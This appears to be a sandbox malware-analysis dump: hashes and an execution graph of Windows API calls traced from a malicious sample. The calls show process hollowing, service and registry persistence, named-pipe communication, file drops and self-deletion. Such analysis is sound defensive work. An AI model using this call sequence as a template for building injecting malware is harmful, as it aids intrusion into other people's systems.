                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$FreeHandleLibraryLoadModuleProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1017166417-0
                                                                                                                                  • Opcode ID: 6d22c46e4b2bbf8f956e586da185c112e243b929c4a2d348202b24ffe9e68596
                                                                                                                                  • Instruction ID: 3f2f1d219ee8f0f1ea79fb751f9843a1d4a105f30f86a694267c209b9e64a0ec
                                                                                                                                  • Opcode Fuzzy Hash: 6d22c46e4b2bbf8f956e586da185c112e243b929c4a2d348202b24ffe9e68596
                                                                                                                                  • Instruction Fuzzy Hash: E9518A7290024AAFCF019F64DC889FAB775FF29304B14456AECA697311E7329A19CB91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:2.4%
                                                                                                                                  Dynamic/Decrypted Code Coverage:26.6%
                                                                                                                                  Signature Coverage:0%
                                                                                                                                  Total number of Nodes:1924
                                                                                                                                  Total number of Limit Nodes:18
                                                                                                                                  execution_graph 19685 418140 19686 41817e 19685->19686 19688 418187 7 library calls 19685->19688 19689 417880 19686->19689 19691 417893 __callnewh 19689->19691 19692 4178a8 __callnewh 19689->19692 19691->19692 19693 417910 19691->19693 19692->19688 19694 417921 19693->19694 19695 417972 _V6_HeapAlloc 19694->19695 19696 41795b RtlAllocateHeap 19694->19696 19695->19691 19696->19695 21553 41dac6 21554 41dade __isleadbyte_l 21553->21554 21555 422a30 ___crtLCMapStringA LCMapStringW 21554->21555 21556 41db90 21555->21556 21574 40e749 21575 40dd05 6 API calls 21574->21575 21576 40e751 21575->21576 21577 40e781 lstrcmpA 21576->21577 21578 40e799 21576->21578 21577->21576 20851 40444a 20852 404458 20851->20852 20853 40446a 20852->20853 20855 401940 20852->20855 20856 40ec2e codecvt 4 API calls 20855->20856 20857 401949 20856->20857 20857->20853 21448 405e4d 21449 405048 8 API calls 21448->21449 21450 405e55 21449->21450 21451 405e64 21450->21451 21452 401940 4 API calls 21450->21452 21452->21451 20858 408c51 20859 408c86 20858->20859 20860 408c5d 20858->20860 20861 408c8b lstrcmpA 20859->20861 20871 408c7b 20859->20871 20864 408c7d 20860->20864 20865 408c6e 20860->20865 20862 408c9e 20861->20862 20861->20871 20863 408cad 20862->20863 20866 40ec2e codecvt 4 API calls 20862->20866 20870 40ebcc 4 API calls 20863->20870 20863->20871 20880 408bb3 20864->20880 20872 408be7 20865->20872 20866->20863 20870->20871 20873 408bf2 20872->20873 20874 408c2a 20872->20874 20875 408bb3 6 API calls 20873->20875 20874->20871 20876 408bf8 20875->20876 20884 406410 20876->20884 20878 408c01 20878->20874 20899 406246 20878->20899 20881 408bbc 20880->20881 20882 408be4 20880->20882 20881->20882 20883 406246 6 API calls 20881->20883 20883->20882 20885 406421 20884->20885 20886 40641e 20884->20886 20887 40643a 20885->20887 20888 40643e VirtualAlloc 20885->20888 20886->20878 20887->20878 20889 406472 20888->20889 20890 40645b VirtualAlloc 20888->20890 20891 40ebcc 4 API calls 20889->20891 20890->20889 20898 4064fb 20890->20898 20892 406479 20891->20892 20892->20898 20909 406069 20892->20909 20895 4064da 20897 406246 6 API calls 20895->20897 20895->20898 20897->20898 20898->20878 20900 406252 20899->20900 20908 4062b3 20899->20908 20901 40628f 20900->20901 20904 406281 FreeLibrary 20900->20904 20907 406297 20900->20907 20905 40ec2e codecvt 4 API calls 20901->20905 20902 4062a0 VirtualFree 20903 4062ad 20902->20903 20906 40ec2e codecvt 4 API calls 20903->20906 20904->20900 20905->20907 20906->20908 20907->20902 20907->20903 20908->20874 20910 406090 IsBadReadPtr 20909->20910 20912 406089 20909->20912 20910->20912 20916 4060aa 20910->20916 20911 4060c0 LoadLibraryA 20911->20912 20911->20916 20912->20895 20919 405f3f 20912->20919 20913 40ebcc 4 API calls 20913->20916 20914 40ebed 8 API calls 20914->20916 20915 406191 IsBadReadPtr 20915->20912 20915->20916 20916->20911 20916->20912 20916->20913 20916->20914 20916->20915 20917 406141 GetProcAddress 20916->20917 20918 406155 GetProcAddress 20916->20918 20917->20916 20918->20916 20920 405fe6 20919->20920 20922 405f61 20919->20922 20920->20895 20921 405fbf VirtualProtect 20921->20920 20921->20922 20922->20920 20922->20921 21396 4179d0 21399 417a10 21396->21399 21402 41bcc0 21399->21402 21401 4179fb 21405 41bce5 7 library calls 21402->21405 21403 41bd95 __itow_s __VCrtDbgReportA __VCrtDbgReportW 21403->21401 21405->21403 21406 417a40 21405->21406 21407 417a4f __snwprintf_s _memcpy_s 21406->21407 21409 417a6d 21407->21409 21410 4219d0 21407->21410 21409->21403 21411 416f00 FindHandlerForForeignException RtlEncodePointer 21410->21411 21412 4219e4 21411->21412 21413 421a1d __encode_pointer 21412->21413 21414 416e30 __encode_pointer RtlEncodePointer 21412->21414 21413->21409 21415 421a4c 21414->21415 21416 416e30 __encode_pointer RtlEncodePointer 21415->21416 21417 421a69 21416->21417 21418 416e30 __encode_pointer RtlEncodePointer 21417->21418 21419 421a86 21418->21419 21420 416e30 __encode_pointer RtlEncodePointer 21419->21420 21421 421aa9 21420->21421 21421->21413 21422 416e30 __encode_pointer RtlEncodePointer 21421->21422 21422->21413 21823 4043d2 21824 4043e0 21823->21824 21825 4043ef 21824->21825 21826 401940 4 API calls 21824->21826 21826->21825 20923 405453 20928 40543a 20923->20928 20931 405048 20928->20931 20936 404bd1 GetTickCount 20931->20936 20934 40508b 20935 40ec2e codecvt 4 API calls 20935->20934 20937 404bff InterlockedExchange 20936->20937 20938 404c08 20937->20938 20939 404bec GetTickCount 20937->20939 20938->20934 20938->20935 20939->20938 20940 404bf7 Sleep 20939->20940 20940->20937 21557 404ed3 21562 404c9a 21557->21562 21563 404cd8 21562->21563 21565 404ca9 21562->21565 21564 40ec2e codecvt 4 API calls 21564->21563 21565->21564 21116 40195b 21117 401971 21116->21117 21118 40196b 21116->21118 21119 40ec2e codecvt 4 API calls 21118->21119 21119->21117 20941 40405e CreateEventA 20942 404084 20941->20942 20943 40407d 20941->20943 20944 403ecd 6 API calls 20942->20944 20945 40408f 20944->20945 20946 404000 3 API calls 20945->20946 20947 404095 20946->20947 20948 404130 20947->20948 20953 403f18 4 API calls 20947->20953 20949 403ecd 6 API calls 20948->20949 20950 404159 CreateNamedPipeA 20949->20950 20951 404167 Sleep 20950->20951 20952 404188 ConnectNamedPipe 20950->20952 20951->20948 20954 404176 CloseHandle 20951->20954 20956 404195 GetLastError 20952->20956 20965 4041ab 20952->20965 20955 4040da 20953->20955 20954->20952 20957 403f8c 4 API calls 20955->20957 20958 40425e DisconnectNamedPipe 20956->20958 20956->20965 20959 4040ec 20957->20959 20958->20952 20960 404127 CloseHandle 20959->20960 20961 404101 20959->20961 20960->20948 20963 403f18 4 API calls 20961->20963 20962 403f18 WriteFile GetLastError WaitForSingleObject GetOverlappedResult 20962->20965 20964 40411c ExitProcess 20963->20964 20965->20952 20965->20958 20965->20962 20966 403f8c ReadFile GetLastError WaitForSingleObject GetOverlappedResult 20965->20966 20967 40426a CloseHandle CloseHandle 20965->20967 20966->20965 20968 40e318 23 API calls 20967->20968 20969 40427b 20968->20969 20969->20969 21120 404960 21121 40496d 21120->21121 21123 40497d 21120->21123 21122 40ebed 8 API calls 21121->21122 21122->21123 19616 4160e0 19617 4160f1 19616->19617 19620 4160f6 19616->19620 19631 41ad60 19617->19631 19619 41610b 19620->19619 19622 40c125 19620->19622 19635 40ec54 GetSystemTimeAsFileTime GetVolumeInformationA 19622->19635 19624 40c12d 19637 40e654 19624->19637 19626 40c2bd 19627 40e654 13 API calls 19626->19627 19628 40c2c9 19627->19628 19629 40e654 13 API calls 19628->19629 19630 40c2d5 19629->19630 19630->19620 19632 41ad6e 19631->19632 19634 41ad75 19631->19634 19661 41a1c0 19632->19661 19634->19620 19636 40ec7e 19635->19636 19636->19624 19648 40dd05 GetTickCount 19637->19648 19639 40e6a5 19646 40e6f5 19639->19646 19655 40ebcc GetProcessHeap HeapAlloc 19639->19655 19641 40e65f 19641->19639 19642 40e68c lstrcmpA 19641->19642 19642->19641 19643 40e6b0 19644 40e6b7 19643->19644 19645 40e6e0 lstrcpynA 19643->19645 19643->19646 19644->19626 19645->19646 19646->19644 19647 40e71d lstrcmpA 19646->19647 19647->19646 19649 40dd41 InterlockedExchange 19648->19649 19650 40dd20 GetCurrentThreadId 19649->19650 19651 40dd4a 19649->19651 19652 40dd53 GetCurrentThreadId 19650->19652 19653 40dd2e GetTickCount 19650->19653 19651->19652 19652->19641 19653->19651 19654 40dd39 Sleep 19653->19654 19654->19649 19658 40eb74 19655->19658 19659 40eb7b GetProcessHeap HeapSize 19658->19659 19660 40eb93 19658->19660 19659->19660 19660->19643 19662 41a1fe __getptd getSystemCP ___updatetmbcinfo 19661->19662 19664 41a279 __setmbcp 19662->19664 19665 41a570 19662->19665 19664->19634 19667 41a58c getSystemCP 19665->19667 19666 41a598 __setmbcp_nolock 19666->19664 19667->19666 19668 41a707 __setmbcp_nolock 19667->19668 19669 41a5dc __setmbcp_nolock 19667->19669 19668->19666 19672 41aa20 19668->19672 19670 41aa20 setSBUpLow LCMapStringW 19669->19670 19670->19666 19673 41aa49 ___crtLCMapStringW 19672->19673 19674 41ab9c 19673->19674 19678 422a30 19673->19678 19674->19666 19677 422a30 ___crtLCMapStringA LCMapStringW 19677->19674 19679 422a44 19678->19679 19682 422a90 19679->19682 19681 41ab65 19681->19677 19683 422aa1 LCMapStringW 19682->19683 19684 422abd __freea strncnt __MarkAllocaS ___convertcp ___ansicp 19682->19684 19683->19684 19684->19681 19697 409961 RegisterServiceCtrlHandlerA 19698 40997d 19697->19698 19705 4099cb 19697->19705 19707 409892 19698->19707 19700 40999a 19701 4099ba 19700->19701 19702 409892 SetServiceStatus 19700->19702 19704 409892 SetServiceStatus 19701->19704 19701->19705 19703 4099aa 19702->19703 19703->19701 19710 4098f2 19703->19710 19704->19705 19708 4098c2 SetServiceStatus 19707->19708 19708->19700 19711 4098f6 19710->19711 19713 409904 Sleep 19711->19713 19716 409917 19711->19716 19718 404280 CreateEventA 19711->19718 19713->19711 19714 409915 19713->19714 19714->19716 19715 409947 19715->19701 19716->19715 19745 40977c 19716->19745 19719 4042a5 19718->19719 19720 40429d 19718->19720 19759 403ecd 19719->19759 19720->19711 19722 4042b0 19763 404000 19722->19763 19725 4043c1 FindCloseChangeNotification 19725->19720 19726 4042ce 19769 403f18 WriteFile 19726->19769 19731 4043ba CloseHandle 19731->19725 19732 404318 19733 403f18 4 API calls 19732->19733 19734 404331 19733->19734 19735 403f18 4 API calls 19734->19735 19736 40434a 19735->19736 19737 40ebcc 4 API calls 19736->19737 19738 404350 19737->19738 19739 403f18 4 API calls 19738->19739 19740 404389 19739->19740 19777 40ec2e 19740->19777 19743 403f8c 4 API calls 19744 40439f CloseHandle CloseHandle 19743->19744 19744->19720 19803 40ee2a 19745->19803 19748 4097bb 19748->19715 19749 4097c2 19750 4097d4 GetThreadContext 19749->19750 19751 409801 19750->19751 19752 4097f5 19750->19752 19805 40637c 19751->19805 19753 4097f6 TerminateProcess 19752->19753 19753->19748 19755 409816 19755->19753 19756 40981e WriteProcessMemory 19755->19756 19756->19752 19757 40983b SetThreadContext 19756->19757 19757->19752 19758 409858 ResumeThread 19757->19758 19758->19748 19760 403edc 19759->19760 19762 403ee2 19759->19762 19782 406dc2 19760->19782 19762->19722 19764 40400b CreateFileA 19763->19764 19765 40402c GetLastError 19764->19765 19766 404052 19764->19766 19765->19766 19767 404037 19765->19767 19766->19720 19766->19725 19766->19726 19767->19766 19768 404041 Sleep 19767->19768 19768->19764 19768->19766 19770 403f4e GetLastError 19769->19770 19772 403f7c 19769->19772 19771 403f5b WaitForSingleObject GetOverlappedResult 19770->19771 19770->19772 19771->19772 19773 403f8c ReadFile 19772->19773 19774 403ff0 19773->19774 19775 403fc2 GetLastError 19773->19775 19774->19731 19774->19732 19775->19774 19776 403fcf WaitForSingleObject GetOverlappedResult 19775->19776 19776->19774 19778 40ec37 19777->19778 19779 40438f 19777->19779 19800 40eba0 19778->19800 19779->19743 19783 406e24 19782->19783 19784 406dd7 19782->19784 19783->19762 19788 406cc9 19784->19788 19786 406ddc 19786->19783 19786->19786 19787 406e02 GetVolumeInformationA 19786->19787 19787->19783 19789 406cdc GetModuleHandleA GetProcAddress 19788->19789 19790 406dbe 19788->19790 19791 406d12 GetSystemDirectoryA 19789->19791 19792 406cfd 19789->19792 19790->19786 19793 406d27 GetWindowsDirectoryA 19791->19793 19794 406d1e 19791->19794 19792->19791 19796 406d8b 19792->19796 19795 406d42 19793->19795 19794->19793 19794->19796 19798 40ef1e lstrlenA 19795->19798 19796->19790 19799 40ef32 19798->19799 19799->19796 19801 40eba7 GetProcessHeap HeapSize 19800->19801 19802 40ebbf GetProcessHeap HeapFree 19800->19802 19801->19802 19802->19779 19804 409794 CreateProcessA 19803->19804 19804->19748 19804->19749 19806 406386 19805->19806 19807 40638a GetModuleHandleA VirtualAlloc 19805->19807 19806->19755 19808 4063f5 19807->19808 19809 4063b6 19807->19809 19808->19755 19810 4063be VirtualAllocEx 19809->19810 19810->19808 19811 4063d6 19810->19811 19812 4063df WriteProcessMemory 19811->19812 19812->19808 20970 404861 IsBadWritePtr 20971 404876 20970->20971 19826 409a6b SetErrorMode SetErrorMode SetUnhandledExceptionFilter 19827 40ec54 2 API calls 19826->19827 19828 409a95 19827->19828 19829 409aa3 GetModuleHandleA GetModuleFileNameA 19828->19829 19834 40a3c7 19828->19834 19842 409ac4 19829->19842 19830 40a41c CreateThread WSAStartup 20053 40e52e 19830->20053 19831 409afd GetCommandLineA 19843 409b22 19831->19843 19832 40a406 DeleteFileA 19832->19834 19835 40a40d 19832->19835 19834->19830 19834->19832 19834->19835 19837 40a3ed GetLastError 19834->19837 19835->19830 19836 40a445 20072 40eaaf 19836->20072 19837->19835 19840 40a3f8 Sleep 19837->19840 19839 40a44d 20076 401d96 19839->20076 19840->19832 19842->19831 19847 409c0c 19843->19847 19853 409b47 19843->19853 19943 4096aa 19847->19943 19857 409b96 lstrlenA 19853->19857 19859 409b58 19853->19859 19854 40a1d2 19860 40a1e3 GetCommandLineA 19854->19860 19855 409c39 19858 40a167 GetModuleHandleA GetModuleFileNameA 19855->19858 19864 409c4b 19855->19864 19857->19859 19862 409c05 ExitProcess 19858->19862 19863 40a189 19858->19863 19859->19862 19865 409bd2 19859->19865 19882 40a205 19860->19882 19861 40c125 15 API calls 19866 40a47a 19861->19866 19863->19862 19873 40a1b2 GetDriveTypeA 19863->19873 19864->19858 19867 404280 30 API calls 19864->19867 19955 40675c 19865->19955 20156 408db1 19866->20156 19868 409c5b 19867->19868 19868->19858 19875 40675c 21 API calls 19868->19875 19873->19862 19874 40a1c5 19873->19874 20045 409145 GetModuleHandleA GetModuleFileNameA CharToOemA 19874->20045 19877 409c79 19875->19877 19877->19858 19885 409ca0 GetTempPathA 19877->19885 19887 409e3e 19877->19887 19878 409bff 19878->19862 19880 40a491 19881 40a49f GetTickCount 19880->19881 19883 40a4be Sleep 19880->19883 19888 40a4b7 GetTickCount 19880->19888 20160 40c913 19880->20160 19881->19880 19881->19883 19892 40a285 lstrlenA 19882->19892 19902 40a239 19882->19902 19883->19880 19886 409cba 19885->19886 19885->19887 19993 4099d2 lstrcpyA 19886->19993 19891 409e6b GetEnvironmentVariableA 19887->19891 19895 409e04 19887->19895 19888->19883 19890 40ec2e codecvt 4 API calls 19894 40a15d 19890->19894 19891->19895 19896 409e7d 19891->19896 19892->19902 19894->19858 19894->19862 19895->19890 19897 4099d2 16 API calls 19896->19897 19898 409e9d 19897->19898 19898->19895 19904 409eb0 lstrcpyA lstrlenA 19898->19904 19899 406dc2 6 API calls 19901 409d5f 19899->19901 19907 406cc9 5 API calls 19901->19907 19951 406ec3 19902->19951 19903 40a3c2 19905 4098f2 41 API calls 19903->19905 19906 409ef4 19904->19906 19905->19834 19908 406dc2 6 API calls 19906->19908 19911 409f03 19906->19911 19910 409d72 lstrcpyA lstrcatA lstrcatA 19907->19910 19908->19911 19909 40a39d StartServiceCtrlDispatcherA 19909->19903 19914 409cf6 19910->19914 19912 409f32 RegOpenKeyExA 19911->19912 19913 409f48 RegSetValueExA RegCloseKey 19912->19913 19918 409f70 19912->19918 19913->19918 20000 409326 19914->20000 19915 40a35f 19915->19903 19915->19909 19923 409f9d GetModuleHandleA GetModuleFileNameA 19918->19923 19919 409e0c DeleteFileA 19919->19887 19920 409dde GetFileAttributesExA 19920->19919 19921 409df7 19920->19921 19921->19895 20037 4096ff 19921->20037 19925 409fc2 19923->19925 19926 40a093 19923->19926 19925->19926 19932 409ff1 GetDriveTypeA 19925->19932 19927 40a103 CreateProcessA 19926->19927 19928 40a0a4 wsprintfA 19926->19928 19929 40a13a 19927->19929 19930 40a12a DeleteFileA 19927->19930 20043 402544 19928->20043 19929->19895 19935 4096ff 3 API calls 19929->19935 19930->19929 19932->19926 19934 40a00d 19932->19934 19937 40a02d lstrcatA 19934->19937 19935->19895 19936 40ee2a 19938 40a0ec lstrcatA 19936->19938 19939 40a046 19937->19939 19938->19927 19940 40a052 lstrcatA 19939->19940 19941 40a064 lstrcatA 19939->19941 19940->19941 19941->19926 19942 40a081 lstrcatA 19941->19942 19942->19926 19944 4096b9 19943->19944 20263 4073ff 19944->20263 19946 4096e2 19947 4096e9 19946->19947 19948 4096fa 19946->19948 20283 40704c 19947->20283 19948->19854 19948->19855 19950 4096f7 19950->19948 19952 406ecc 19951->19952 19954 406ed5 19951->19954 20308 406e36 GetUserNameW 19952->20308 19954->19915 19956 406784 CreateFileA 19955->19956 19957 40677a SetFileAttributesA 19955->19957 19958 4067a4 CreateFileA 19956->19958 19959 4067b5 19956->19959 19957->19956 19958->19959 19960 4067c5 19959->19960 19961 4067ba SetFileAttributesA 19959->19961 19962 406977 19960->19962 19963 4067cf GetFileSize 19960->19963 19961->19960 19962->19862 19980 406a60 CreateFileA 19962->19980 19964 4067e5 19963->19964 19978 406922 19963->19978 19966 4067ed ReadFile 19964->19966 19964->19978 19965 40696e CloseHandle 19965->19962 19967 406811 SetFilePointer 19966->19967 19966->19978 19968 40682a ReadFile 19967->19968 19967->19978 19969 406848 SetFilePointer 19968->19969 19968->19978 19970 406867 19969->19970 19969->19978 19971 406878 ReadFile 19970->19971 19972 4068d0 19970->19972 19971->19970 19971->19972 19972->19965 19973 40ebcc 4 API calls 19972->19973 19974 4068f8 19973->19974 19975 406900 SetFilePointer 19974->19975 19974->19978 19976 40695a 19975->19976 19977 40690d ReadFile 19975->19977 19979 40ec2e codecvt 4 API calls 19976->19979 19977->19976 19977->19978 19978->19965 19979->19978 19981 406b8c GetLastError 19980->19981 19982 406a8f GetDiskFreeSpaceA 19980->19982 19983 406b86 19981->19983 19984 406ac5 19982->19984 19992 406ad7 19982->19992 19983->19878 20311 40eb0e 19984->20311 19988 406b56 CloseHandle 19988->19983 19991 406b65 GetLastError CloseHandle 19988->19991 19989 406b36 GetLastError CloseHandle 19990 406b7f DeleteFileA 19989->19990 19990->19983 19991->19990 20315 406987 19992->20315 19994 4099eb 19993->19994 19995 409a2f lstrcatA 19994->19995 19996 40ee2a 19995->19996 19997 409a4b lstrcatA 19996->19997 19998 406a60 13 API calls 19997->19998 19999 409a60 19998->19999 19999->19887 19999->19899 19999->19914 20325 401910 20000->20325 20003 40934a GetModuleHandleA GetModuleFileNameA 20005 40937f 20003->20005 20006 4093a4 20005->20006 20007 4093d9 20005->20007 20008 4093c3 wsprintfA 20006->20008 20009 409401 wsprintfA 20007->20009 20011 409415 20008->20011 20009->20011 20010 4094a0 20327 406edd 20010->20327 20011->20010 20014 406cc9 5 API calls 20011->20014 20013 4094ac 20015 40962f 20013->20015 20016 4094e8 RegOpenKeyExA 20013->20016 20020 409439 20014->20020 20022 409646 20015->20022 20348 401820 20015->20348 20018 409502 20016->20018 20019 4094fb 20016->20019 20024 40951f RegQueryValueExA 20018->20024 20019->20015 20023 40958a 20019->20023 20025 40ef1e lstrlenA 20020->20025 20031 4095d6 20022->20031 20354 4091eb 20022->20354 20023->20022 20027 409593 20023->20027 20028 409530 20024->20028 20029 409539 20024->20029 20026 409462 20025->20026 20032 40947e wsprintfA 20026->20032 20027->20031 20335 40f0e4 20027->20335 20030 40956e RegCloseKey 20028->20030 20033 409556 RegQueryValueExA 20029->20033 20030->20019 20031->19919 20031->19920 20032->20010 20033->20028 20033->20030 20035 4095bb 20035->20031 20342 4018e0 20035->20342 20038 402544 20037->20038 20039 40972d RegOpenKeyExA 20038->20039 20040 409740 20039->20040 20041 409765 20039->20041 20042 40974f RegDeleteValueA RegCloseKey 20040->20042 20041->19895 20042->20041 20044 402554 lstrcatA 20043->20044 20044->19936 20046 402544 20045->20046 20047 40919e wsprintfA 20046->20047 20048 4091bb 20047->20048 20393 409064 GetTempPathA 20048->20393 20051 4091d5 ShellExecuteA 20052 4091e7 20051->20052 20052->19878 20054 40dd05 6 API calls 20053->20054 20055 40e538 20054->20055 20400 40dbcf 20055->20400 20057 40e544 20058 40e555 GetFileSize 20057->20058 20062 40e5b8 20057->20062 20059 40e5b1 CloseHandle 20058->20059 20060 40e566 20058->20060 20059->20062 20410 40db2e 20060->20410 20419 40e3ca RegOpenKeyExA 20062->20419 20064 40e576 ReadFile 20064->20059 20066 40e58d 20064->20066 20414 40e332 20066->20414 20068 40e5f2 20070 40e629 20068->20070 20071 40e3ca 19 API calls 20068->20071 20070->19836 20071->20070 20073 40eabe 20072->20073 20075 40eaba 20072->20075 20074 40dd05 6 API calls 20073->20074 20073->20075 20074->20075 20075->19839 20077 40ee2a 20076->20077 20078 401db4 GetVersionExA 20077->20078 20079 401dd0 GetSystemInfo GetModuleHandleA GetProcAddress 20078->20079 20081 401e24 20079->20081 20082 401e16 GetCurrentProcess 20079->20082 20472 40e819 20081->20472 20082->20081 20084 401e3d 20085 40e819 11 API calls 20084->20085 20086 401e4e 20085->20086 20087 401e77 20086->20087 20479 40df70 20086->20479 20488 40ea84 20087->20488 20091 401e6c 20092 40df70 12 API calls 20091->20092 20092->20087 20093 40e819 11 API calls 20094 401e93 20093->20094 20492 40199c inet_addr LoadLibraryA 20094->20492 20097 40e819 11 API calls 20098 401eb9 20097->20098 20099 401ed8 20098->20099 20101 40f04e 4 API calls 20098->20101 20100 40e819 11 API calls 20099->20100 20103 401eee 20100->20103 20102 401ec9 20101->20102 20104 40ea84 30 API calls 20102->20104 20111 401f0a 20103->20111 20505 401b71 20103->20505 20104->20099 20106 40e819 11 API calls 20108 401f23 20106->20108 20107 401efd 20109 40ea84 30 API calls 20107->20109 20117 401f3f 20108->20117 20509 401bdf 20108->20509 20109->20111 20110 40e819 11 API calls 20114 401f5e 20110->20114 20111->20106 20116 401f77 20114->20116 20118 40ea84 30 API calls 20114->20118 20115 40ea84 30 API calls 20115->20117 20516 4030b5 20116->20516 20117->20110 20118->20116 20121 406ec3 2 API calls 20122 401f8e 20121->20122 20123 4080c9 20122->20123 20124 406ec3 2 API calls 20123->20124 20125 4080eb 20124->20125 20126 4080f9 20125->20126 20127 4080ef 20125->20127 20129 40704c 16 API calls 20126->20129 20564 407ee6 20127->20564 20131 408110 20129->20131 20130 408269 CreateThread 20148 405e6c 20130->20148 20133 408156 RegOpenKeyExA 20131->20133 20134 4080f4 20131->20134 20132 40675c 21 API calls 20139 408244 20132->20139 20133->20134 20135 40816d RegQueryValueExA 20133->20135 20134->20130 20134->20132 20136 4081f7 20135->20136 20137 40818d 20135->20137 20138 40820d RegCloseKey 20136->20138 20141 40ec2e codecvt 4 API calls 20136->20141 20137->20136 20142 40ebcc 4 API calls 20137->20142 20138->20134 20139->20130 20140 40ec2e codecvt 4 API calls 20139->20140 20140->20130 20147 4081dd 20141->20147 20143 4081a0 20142->20143 20143->20138 20144 4081aa RegQueryValueExA 20143->20144 20144->20136 20145 4081c4 20144->20145 20146 40ebcc 4 API calls 20145->20146 20146->20147 20147->20138 20149 40ec54 2 API calls 20148->20149 20150 405e71 20149->20150 20151 40e654 13 API calls 20150->20151 20152 405ec1 20151->20152 20153 403132 20152->20153 20154 40df70 12 API calls 20153->20154 20155 40313b 20154->20155 20155->19861 20157 408dbc 20156->20157 20158 40e654 13 API calls 20157->20158 20159 408dec Sleep 20158->20159 20159->19880 20161 40c92f 20160->20161 20162 40c93c 20161->20162 20632 40c517 20161->20632 20164 40e819 11 API calls 20162->20164 20196 40ca2b 20162->20196 20165 40c96a 20164->20165 20166 40e819 11 API calls 20165->20166 20167 40c97d 20166->20167 20168 40e819 11 API calls 20167->20168 20169 40c990 20168->20169 20170 40c9aa 20169->20170 20171 40ebcc 4 API calls 20169->20171 20170->20196 20649 402684 20170->20649 20171->20170 20176 40ca26 20656 40c8aa 20176->20656 20179 40ca44 20180 40ca4b closesocket 20179->20180 20181 40ca83 20179->20181 20180->20176 20182 40ea84 30 API calls 20181->20182 20183 40caac 20182->20183 20184 40f04e 4 API calls 20183->20184 20185 40cab2 20184->20185 20186 40ea84 30 API calls 20185->20186 20187 40caca 20186->20187 20188 40ea84 30 API calls 20187->20188 20189 40cad9 20188->20189 20664 40c65c 20189->20664 20192 40cb60 closesocket 20192->20196 20194 40dad2 closesocket 20195 40e318 23 API calls 20194->20195 20195->20196 20196->19880 20197 40df4c 20 API calls 20256 40cb70 20197->20256 20202 40e654 13 API calls 20202->20256 20208 40ea84 30 API calls 20208->20256 20209 40cc1c GetTempPathA 20209->20256 20210 40d569 closesocket Sleep 20711 40e318 20210->20711 20211 40d815 wsprintfA 20211->20256 20212 40f04e LoadLibraryA GetProcAddress SystemTimeToFileTime GetSystemTimeAsFileTime 20212->20256 20213 40c517 23 API calls 20213->20256 20215 40e8a1 30 API calls 20215->20256 20216 40d582 ExitProcess 20217 40cfe3 GetSystemDirectoryA 20217->20256 20218 40c65c send GetProcessHeap HeapSize GetProcessHeap HeapAlloc 20218->20256 20219 40675c 21 API calls 20219->20256 20220 40d027 GetSystemDirectoryA 20220->20256 20221 40cfad GetEnvironmentVariableA 20221->20256 20222 40d105 lstrcatA 20222->20256 20223 40ef1e lstrlenA 20223->20256 20224 40ec2e GetProcessHeap HeapSize GetProcessHeap HeapFree codecvt 20224->20256 20225 40cc9f CreateFileA 20227 40ccc6 WriteFile 20225->20227 20225->20256 20226 40d15b CreateFileA 20228 40d182 WriteFile CloseHandle 20226->20228 20226->20256 20229 40cdcc CloseHandle 20227->20229 20230 40cced CloseHandle 20227->20230 20228->20256 20229->20256 20236 40cd2f 20230->20236 20231 40d149 SetFileAttributesA 20231->20226 20232 40cd16 wsprintfA 20232->20236 20233 40d36e GetEnvironmentVariableA 20233->20256 20234 40d1bf SetFileAttributesA 20234->20256 20235 408e26 GetSystemTime SystemTimeToFileTime CreateFileW DeviceIoControl CloseHandle 20235->20256 20236->20232 20693 407fcf 20236->20693 20237 407ead 6 API calls 20237->20256 20238 40d22d GetEnvironmentVariableA 20238->20256 20240 40d3af lstrcatA 20243 40d3f2 CreateFileA 20240->20243 20240->20256 20242 407fcf 64 API calls 20242->20256 20246 40d415 WriteFile CloseHandle 20243->20246 20243->20256 20244 40cd81 WaitForSingleObject CloseHandle CloseHandle 20247 40f04e 4 API calls 20244->20247 20245 40cda5 20248 407ee6 64 API calls 20245->20248 20246->20256 20247->20245 20249 40cdbd DeleteFileA 20248->20249 20249->20256 20250 40d4b1 CreateProcessA 20254 40d4e8 CloseHandle CloseHandle 20250->20254 20250->20256 20251 40d3e0 SetFileAttributesA 20251->20243 20252 40d26e lstrcatA 20253 40d2b1 CreateFileA 20252->20253 20252->20256 20253->20256 20257 40d2d8 WriteFile CloseHandle 20253->20257 20254->20256 20255 40d452 SetFileAttributesA 20255->20256 20256->20194 20256->20197 20256->20202 20256->20208 20256->20209 20256->20210 20256->20211 20256->20212 20256->20213 20256->20215 20256->20217 20256->20218 20256->20219 20256->20220 20256->20221 20256->20222 20256->20223 20256->20224 20256->20225 20256->20226 20256->20231 20256->20233 20256->20234 20256->20235 20256->20237 20256->20238 20256->20240 20256->20242 20256->20243 20256->20250 20256->20251 20256->20252 20256->20253 20256->20255 20258 407ee6 64 API calls 20256->20258 20259 40d29f SetFileAttributesA 20256->20259 20262 40d31d SetFileAttributesA 20256->20262 20672 40c75d 20256->20672 20684 407e2f 20256->20684 20706 407ead 20256->20706 20716 4031d0 20256->20716 20733 403c09 20256->20733 20743 403a00 20256->20743 20747 40e7b4 20256->20747 20750 40c06c 20256->20750 20756 406f5f GetUserNameA 20256->20756 20767 40e854 20256->20767 20777 407dd6 20256->20777 20257->20256 20258->20256 20259->20253 20262->20256 20264 40741b 20263->20264 20265 406dc2 6 API calls 20264->20265 20266 40743f 20265->20266 20267 407469 RegOpenKeyExA 20266->20267 20269 4077f9 20267->20269 20272 407487 ___ascii_stricmp 20267->20272 20268 407703 RegEnumKeyA 20270 407714 RegCloseKey 20268->20270 20268->20272 20269->19946 20270->20269 20271 4074d2 RegOpenKeyExA 20271->20272 20272->20268 20272->20271 20273 40772c 20272->20273 20274 407521 RegQueryValueExA 20272->20274 20278 4076e4 RegCloseKey 20272->20278 20280 40f1a5 lstrlenA 20272->20280 20281 40777e GetFileAttributesExA 20272->20281 20282 407769 20272->20282 20275 407742 RegCloseKey 20273->20275 20276 40774b 20273->20276 20274->20272 20275->20276 20277 4077ec RegCloseKey 20276->20277 20277->20269 20278->20272 20279 4077e3 RegCloseKey 20279->20277 20280->20272 20281->20282 20282->20279 20284 407073 20283->20284 20285 4070b9 RegOpenKeyExA 20284->20285 20286 4070d0 20285->20286 